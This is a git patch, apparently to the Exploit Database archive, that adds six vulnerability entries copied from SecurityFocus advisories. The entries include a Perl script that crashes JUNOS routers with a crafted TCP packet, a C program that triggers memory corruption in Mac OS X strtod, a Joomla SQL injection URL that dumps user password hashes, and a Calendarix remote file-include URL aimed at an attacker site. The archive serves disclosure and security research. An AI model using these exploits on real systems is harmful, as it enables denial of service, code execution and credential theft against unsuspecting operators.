From d9c7bc59dbacf6390419278b7a546baabd53734a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 24 May 2014 04:36:31 +0000 Subject: [PATCH] Updated 05_24_2014 --- files.csv | 6 ++++++ platforms/asp/webapps/33481.txt | 9 +++++++++ platforms/hardware/dos/33476.pl | 30 ++++++++++++++++++++++++++++++ platforms/linux/dos/33480.txt | 9 +++++++++ platforms/osx/dos/33479.c | 17 +++++++++++++++++ platforms/php/webapps/33477.txt | 9 +++++++++ platforms/php/webapps/33478.txt | 7 +++++++ 7 files changed, 87 insertions(+) create mode 100755 platforms/asp/webapps/33481.txt create mode 100755 platforms/hardware/dos/33476.pl create mode 100755 platforms/linux/dos/33480.txt create mode 100755 platforms/osx/dos/33479.c create mode 100755 platforms/php/webapps/33477.txt create mode 100755 platforms/php/webapps/33478.txt diff --git a/files.csv b/files.csv index 322710d99..d37e9f28b 100755 --- a/files.csv +++ b/files.csv @@ -30159,3 +30159,9 @@ id,file,description,date,author,platform,type,port 33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 Cross Site Scripting Vulnerability",2010-01-06,"j4ck and Globus",php,webapps,0 33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component 'id' Parameter SQL Injection Vulnerability",2010-01-07,NoGe,php,webapps,0 33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 Multiple SQL Injection and HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 +33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS <= 7.1.1 Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 +33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 'calpath' Parameter Remote File Include Vulnerability",2010-01-07,Saywhat,php,webapps,0 +33478,platforms/php/webapps/33478.txt,"Joomla! Jobads 'type' Parameter SQL Injection Vulnerability",2010-01-08,N0KT4,php,webapps,0 +33479,platforms/osx/dos/33479.c,"Mac OS X 10.x 'libc/strtod(3)' Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 +33480,platforms/linux/dos/33480.txt,"MATLAB R2009b 'dtoa' Implementation Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0 +33481,platforms/asp/webapps/33481.txt,"DevWorx BlogWorx 1.0 'forum.asp' Cross Site Scripting Vulnerability",2010-01-09,Cyber_945,asp,webapps,0 diff --git a/platforms/asp/webapps/33481.txt b/platforms/asp/webapps/33481.txt new file mode 100755 index 000000000..13201b71f --- /dev/null +++ b/platforms/asp/webapps/33481.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37695/info + +DevWorx BlogWorx is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +BlogWorx 1.0 is vulnerable; other versions may be affected as well. + +http://www.example.com/openforum/forum.asp?fid=12&ofact=1&ofmsgid=227&ofdisp=[XSS-Vuln] \ No newline at end of file diff --git a/platforms/hardware/dos/33476.pl b/platforms/hardware/dos/33476.pl new file mode 100755 index 000000000..5cf77cd31 --- /dev/null +++ b/platforms/hardware/dos/33476.pl @@ -0,0 +1,30 @@ +source: http://www.securityfocus.com/bid/37670/info + +JUNOS is prone to a remote denial-of-service vulnerability that arises when the application handles specially crafted TCP packets. + +JUNOS is also prone to six other unspecified security vulnerabilities. These issues may include privilege-escalation or denial-of-service issues. + +JUNOS 7.x, 8.x, and 9.x are affected. JUNOS 10.x is not believed to be affected. + +#!/usr/bin/perl + +my $host = shift; +my $port = shift; + +use Net::Packet qw($Env); + +use Net::Packet::IPv4; +my $ip = Net::Packet::IPv4->new(dst => $host); + +use Net::Packet::TCP; + +my $tcp = Net::Packet::TCP->new( + dst => $port, + options => "\x65\x02\x01\x01", + ); + +use Net::Packet::Frame; +my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp); + +$frame->send; +exit 0; \ No newline at end of file diff --git a/platforms/linux/dos/33480.txt b/platforms/linux/dos/33480.txt new file mode 100755 index 000000000..57d0cbfd2 --- /dev/null +++ b/platforms/linux/dos/33480.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37688/info + +MATLAB is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. + +Attackers may exploit this issue to execute arbitrary code within the context of affected applications. + +MATLAB R2009b is affected; other versions may also be vulnerable. + +cxib=0. \ No newline at end of file diff --git a/platforms/osx/dos/33479.c b/platforms/osx/dos/33479.c new file mode 100755 index 000000000..57387a1e5 --- /dev/null +++ b/platforms/osx/dos/33479.c @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/37687/info + +Mac OS X is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. + +Attackers may exploit this issue to execute arbitrary code within the context of affected applications. + +Mac OS X 10.5 and 10.6 are affected; other versions may also be vulnerable. + +#include +#include +int main () +{ +char number[] = "0.1111111111...11", *e; +double weed = strtod(number, &e); +printf("grams = %lf\n", weed); +return 0; +} \ No newline at end of file diff --git a/platforms/php/webapps/33477.txt b/platforms/php/webapps/33477.txt new file mode 100755 index 000000000..450f6fa12 --- /dev/null +++ b/platforms/php/webapps/33477.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/37673/info + +Calendarix is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. + +Calendarix 0.7 is vulnerable; other versions may also be affected. + +http://www.example.com/cal_config.inc.php?calpath= EVIL SITE??? \ No newline at end of file diff --git a/platforms/php/webapps/33478.txt b/platforms/php/webapps/33478.txt new file mode 100755 index 000000000..f07e562b2 --- /dev/null +++ b/platforms/php/webapps/33478.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/37686/info + +The Jobads component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_jobads&task=view&type=-999+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+mos_users-- \ No newline at end of file